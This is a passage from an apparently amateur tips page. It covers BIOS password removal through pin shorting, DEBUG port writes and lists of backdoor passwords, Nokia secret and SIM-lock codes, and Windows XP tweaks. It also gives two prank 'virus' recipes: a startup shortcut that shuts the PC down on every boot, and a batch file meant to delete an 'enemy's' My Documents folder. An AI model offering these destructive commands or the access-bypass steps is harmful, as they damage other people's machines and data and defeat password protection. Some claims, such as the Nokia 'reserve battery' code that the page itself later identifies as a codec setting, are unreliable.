8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.


Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd


Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

Flashing BIOS via software

If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.

Standard BIOS Backdoor Passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Basic BIOS password crack - works 9.9 times out of ten

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.

Clear BIOS Password

At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)

A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q

If any problem just comment here

Nokia Battery Backup Trick

Imagine ur cell battery is very low, u r expecting an important call and u don't have a charger.

Nokia instrument comes with a reserve battery. To activate, key is "*3370#"

Ur cell will restart with this reserve and ur instrument will show a 50% incerase in battery.

This reserve will get charged when u charge ur cell next time.

*3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx. 5%
#3370# Deactivate Enhanced Full Rate Codec( EFR)


*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound
but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec

NOKIA N95 SECRET CODES

NOKIA N95 SECRET CODES

*#06#
To check IMEI number (International Mobile Equipment Identity)

*#0000#
Firmware version and date, Phone Model and Operator Variant

*#92702689#
Life timer (W A R 0 A N T Y) - The amount of time your phone has spent sending and receiving calls.

*#62209526#
Wireless MAC Address (M A C _ W L A N)

*#2820#
Bluetooth MAC address (B T A 0?)

*#7370#
Format phone (R E S 0 ?)

*#7780#
Factory Reset (R S T 0 ?)

Note:
Format phone :
Restores phone to as if it was out of the box. Retains firmware version and operator Variant changes but wipes all applications you have installed. Does not format the memory card so any apps on there may reinstall once powered back up again.

Another way to format some symbian phones :
Power off phone. Press and hold Green, * and 3 and keep them held whilst powering on and for a few seconds after.

Factory Reset :
Resets all settings to defaults but keeps any applications you have installed and photos etc. Both need the Security code, which, by default, is 12345.

N95 picture viewer:
2 – Scroll up (when zoomed)
4 – Scroll left (when zoomed)
5 – Zoom in (12.5%/25%/50%)
6 – Scroll right (when zoomed)
8 – Scroll down (when zoomed)
0 – Zoom out

Press and hold (in Standby):
Right selection key: Voice commands
Multimedia Key: Now Playing
1: Voicemail
2-9: shortcuts to address book you need to set up first
0: Web
#: Switches between General and Silent modes - not supported by all Operator Variants (when composing messages will switch between character and number input when held down) 12# (etc) in standby will dial the number held in location 12 on your SIM address book.

NOKIA N96 Secret Codes Unlock

Nokia Code : *#06#
To check NOKIA IMEI number (International Mobile Equipment Identity)

Nokia Code : *#0000#
NOKIA Firmware version and date, Phone Model and Operator Variant

Nokia Code : *#92702689#
Life timer (W A R 0 A N T Y) - The amount of time your phone has spent sending and receiving calls.

Nokia Code : *#62209526#
Wireless MAC Address (M A C _ W L A N)

Nokia Code : *#2820#
Bluetooth MAC address (B T A 0?)

Nokia Code : *#7370#
NOKIA Format phone (Soft Reset)

Nokia Code : *#7780#
NOKIA Factory Reset (Hard Reset)

Mobile Secrets

These are Nokia 1100 unlock codes. Using these mobile unlock codes for Nokia 1100 you can see the secret Nokia 1100 codes. Nokia 1100 can be master reset and the serial number for nokia Nokia 1100 can be easily identified. The free unlocking for Nokia 1100 is easy and simple to use. Hope you enjoy the secret codes for Nokia 1100. THe Nokia 1100 is a phone popular Phone and used around the world. The Nokia 1100 come with a lot of features and few of secret codes can make your Nokia 1100 more functional more fruitful.


*#06# for checking the IMEI (International Mobile Equipment Identity) for Nokia 1100 To view Week and Year of manufacture enter *#3283# [*# D A T E #]
The last two digits are the year. If the year is 95, the first two digits are the month. For 96 the first two digits are the week of the year.

To view the software version on Nokia 1100 enter *#170602112302# or *#9999#
On newer phones, the code has been changed to *#682371158412125#



All Nokia phones (Nokia 1100 and newer) have four different SIM locks which can be used to lock the phone for up to 4 different providers. But most phones with restriction only have one lock activated. (Lock 1)

The main code used in Nokia 1100 phones is :
#pw+(master code)+Y#
This code is able to check, activate or remove Sim card restriction (SP-lock).
Use the * key to get the p, + and w chars.
'Y' has to be 1,2,3 or 4 - depending of what lock you what to deal with.

#pw+1234567890+1# for Provider-Lock status
#pw+1234567890+2# for Network-Lock status
#pw+1234567890+3# for Country-Lock status
#pw+1234567890+4# for SimCard-Lock status

# = DOUBLE-CROSS
W = PRESS "*" THREE TIMES
P = PRESS "*" FOUR TIMES
+ = PRESS "*" TWO TIMES
MASTERCODE = 1234567890
Y = NUMBER 1 TO 4

(master code) is a 10 digit code, based on the phones IMEI number.

Eg. To remove restriction on lock 1 type following code:
#pw+(master code)+1#
If you just want to check your phone use 10 random numbers Eg. 1234567890 as the (master code)
eg. To check if phone if restricted on lock 1 type the following code:
#pw+1234567890+1#

Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx

1. Insert SIM card of different provider.
2. Turn on the phone and press the UP VOLUME key for 3 sec.
Then release it and the phone says PIN CODE?
3. Press the "C" key.
4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#

Nokia Secret Codes And Hacks

These codes for the Nokia series of phones provide some interesting information for users, they also unlock some hidden functions. These codes are often referred to as “Nokia Secret Codes” or “Nokia Hacks”. Use the codes at your own risk, not all Nokia phones support all codes.

These 3 codes work on 90% of Nokia phones:-

*#06# n/a Display the IMEI (Standard GSM command, works on all phones)

*#0000# n/a Display the firmware version and date

*#92702689# *#war0anty# Here you can view the S/N and the IMEI as well as the life timer (newer models). The date the phone left the factory and the date it was purchased. If your phone has been repaired the date of the repair is also visible. You will need to turn the phone off to exit this menu. Newer phones simply require you to press ok.

The following codes are specific to older series 40 phones; (Entering the following codes will restart the phone)
*4720# (*hra0#) Cctivates Half Rate, Half Rate is 5.6kbit/s and uses half the bandwidth at the cost of call quality. Network operators often activate half rate on overloaded towers during peak times to save costs.

#4720# (#hra0#) Deactivates Half Rate

*3370# (*efr0#) Activates Enhanced Full Rate, EFT attempts to match wire quality. The calls are 12.2kbit/s and are not supported by all operators. It is compatibale with the hightest AMR mode.

#3370# (#efr0#) Deactivates Enhanced Full Rate

*#746085685# (*#sim0clock#) Display the SIM clock status

The following codes are phone specific or phase related;
*#7220# (*#pca0#) Activate the GPRS PCCCH support (Packet Common Control Channel)

*#7230# (*#pcd0#) Deactivate the GPRS PCCCH support

*#7760# (*#ssn0#) Display the manufacturing serial number

This only works on the 3310 and 3330:-
*#67705646# (*#opr0logo#) Clear the operator logo, the logo will be reset to the default network operator logo.

The following codes work on newer series 40 & series 60/80 phones:-
*#2820# (*#bta0#) Display the Bluetooth MAC address (Phone must have a built in bluetooth adapter)

*#7370925538# (*#res0wallet#) Reset the mobile wallet (Phone must have the mobile wallet feature)

*#7370# (*#res0#) Soft-format the memory (Symbian)

*#7780# (*#rst0#) Reset to factory defaults, confirmation required (also known has a Hard-format), all phone contents will be wiped clean including contacts and smses if they are stored on the phone


If you have any other codes or tips please add them in the comments here

Shutdown Virus

· Navigate to your Desktop.
· Right-click -> New -> Shortcut (in other words, create
a new shortcut).
· You should now see a pop-up window instructing you to enter a command line path.
Enter one of these as the path: SHUTDOWN -s -t 01
· Click the "Next" button.
· Name the shortcut as "Don't Click Here" and click the "Finish" button.
· Move the shortcut into "C:\Documents and Settings\All Users\Start Menu\Programs\Startup".

Restart your computer and see the magic, the system will automatically shutdown when turned on.

Desktop shortcut For Shutdown

· Navigate to your Desktop.
· Right-click -> New -> Shortcut (in other words, create
a new shortcut).
· You should now see a pop-up window instructing you to enter a command line path.
Enter one of these as the path: SHUTDOWN -s -t 01
· Click the "Next" button.
· Name the shortcut as "Don't Click Here" and click the "Finish" button.

Now whenever you want to shut down, just click on this shortcut and you're done.

Computer Won't Shut Down Itself After Installing XP

There are a number of users who have been complaining that their PC will no longer
automatically power down/shut off without pressing the power off button on the computers unlike in Windows Me/95/2000.
There could be a number of reasons for this, but the main one seems to be that ACPI is not enabled on the computer or in Windows XP:-

· Click Start > Control Panel > Performance and Maintenance > Power Options tab.
· Then click APM > Enable Advanced Power Management Support

Display Hibernate Option on the Shut Down dialog

For some reason, Hibernate isn't available from the default Shut Down dialog in XP.
But you can enable it simply enough, by holding down the shift-key while the dialog is visible.
Now you see it, now you don't!

Turn Off Autoplay for Program CDs And For Another Drives

How can you stop Windows XP from launching program CDs?
· Click Start, click Run, type GPEDIT.MSC to open Group Policy in the Microsoft
Management Console.
· Double-click Computer Configuration, double-click Administrative templates,
double-click System, and then click Turn off autoplay.
· The instructions on your screen describe how to configure this setting. Click
Properties to display the setting dialog.
· Click Enabled, and choose CD-ROM drives, then click OK, to stop CD autoplay.
This setting does not prevent Autoplay for music CDs.

Remove Hibernation File To Save Disk Space

If you do not use hibernation, make sure you do not have it enabled, which reserves
disk space equal to your RAM.
If you have a hidden file on the root directory of your
C-drive called hiberfil.sys, hibernation is enabled.
To remove that file:-
· Go to Control Panel, select Performance and Maintenance, Power Options, Hibernate
tab, and uncheck the Enable hibernation box.

Correcting System Hang at Startup

If your system hangs about 2 or 3 minutes at startup, where you can't access the Start
button or the Taskbar, it may be due to one specific service (Background Intelligent
Transfer) running in the background.
Microsoft put out a patch for this but it didn't
work for me.

Here's what you do:-

· Click on Start->Run, type 'msconfig', then click 'OK'.
· Go to the 'Services' tab, find the 'Background Intelligent Transfer' service.
· Disable it, apply the changes & reboot.

Your Comments Plzzzzzzzzzzzzzzzz

Delete Shortcut Arrows From Desktop Icons

This Works For XP, Vista, AND Windows 7.
Do you hate that evertime you create a new icon on the desktop, most of the time, you can’t see it because of that STUPID shortcut arrow on it! Well not anymore! All this takes is a little registry editing.

Step 1. Press on your keyboard the start key+ R. A box that says run will show up. Type in the text box: regedit
regedit

Step 2: It is opened, and a sidebar on the left will show your location. Click on the little arrow next to the folder that says HKEY_CLASSES_ROOT
hkeycr

Step 3: A whole bunch of files will appear, scroll down to the L’s until you see on called lnkfile and click on the folder.
Then, the box will show files in it on the right, and even one that says IsShortcut.
Right click it, and delete it.
Go to your desktop, and right click it.
Click “refresh”.
Then your files that have the shortcut icons on it will not have them, if it doesn't works restart your computer!

Virus which trash files

HERE’S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.

HERE’S WHAT U SHOULD DO.

OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.

Del C:\My Documents

THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.

I MEAN SAVE IT LIKE MYVIRUS.BAT. IT SHOULD HAVE THE ENDING AS .BAT.

Just simple Download Videos From You Tube

1. Open any video which you want to download from youtube.
2. Type voobys instead of youtube in browser.

youtube link : http://www.youtube.com/watch?v=VKT2sIxzws4&feature=dir

after change : http://www.voobys.com/watch?v=VKT2sIxzws4&feature=dir
Change part is in red colour.
3. Click on download button.
4. Movie will be download in .flv format, to watch the movie you can
downlod flv player from internet or you can download converter from the
same page and convert it into .3gp, .avi etc format.
you can download converter from
http://www.voobys. com/software/ download. php this link.

Let me know if you want any other information regarding this.

Insert your name in the bottom right taskbar!

Hey its a very cool trick u can amaze u r freinds and relatives by insertng ur name on the bottom right taskbar. Follow the instructions bellow:

Open Control Panel -> Regional and Language Options -> Customize ->Time
here u can see A.M. and P.M. change it with u r name or anything you like!

Cracking BIOS

Here is the best way to crack the bios password in win 95/98:
Follow the steps below:
1) Boot up windows.2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: "debug" (without quotes ninja.gif )4) type the following lines now exactly as given.......o 70 10o 71 20quitexit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!! biggrin.gif
EnjoYYYYYYYYYY
PS: I tested this in Award Bios........There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data..........
The use of this code is entirely at ur risk.......... It worked fine for me..........

Search your phone details here